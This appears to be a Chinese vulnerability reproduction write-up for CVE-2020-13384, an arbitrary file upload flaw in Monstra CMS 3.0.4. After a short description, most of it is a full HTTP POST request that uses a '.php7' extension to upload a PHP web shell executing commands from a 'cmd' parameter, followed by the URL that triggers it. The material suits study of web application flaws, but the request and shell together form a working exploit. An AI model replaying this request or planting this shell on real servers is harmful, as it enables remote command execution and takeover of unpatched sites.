(CVE-2020-13384)Monstra CMS 3.0.4 任意文件上传漏洞
一、漏洞简介
Monstra CMS是乌克兰Sergey Romanenko软件开发者的一套基于PHP的轻量级内容管理系统(CMS)。 Monstra CMS 3.0.4版本中的index.php脚本存在安全漏洞,该漏洞源于程序没有正确验证文件扩展名。远程攻击者可借助特制HTTP请求利用该漏洞上载和执行任意PHP代码。
二、漏洞影响
Monstra CMS 3.0.4
三、复现过程
访问https://www.0-sec.org/monstra/admin/index.php?id=filesmanager&path=uploads/
POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: www.0-sec.org
Content-Length: 548
Cache-Control: max-age=0
Origin: https://www.0-sec.org
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.0-sec.org/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"
2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"
Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--
https://www.0-sec.org/monstra/public/uploads/shell.php7?cmd=id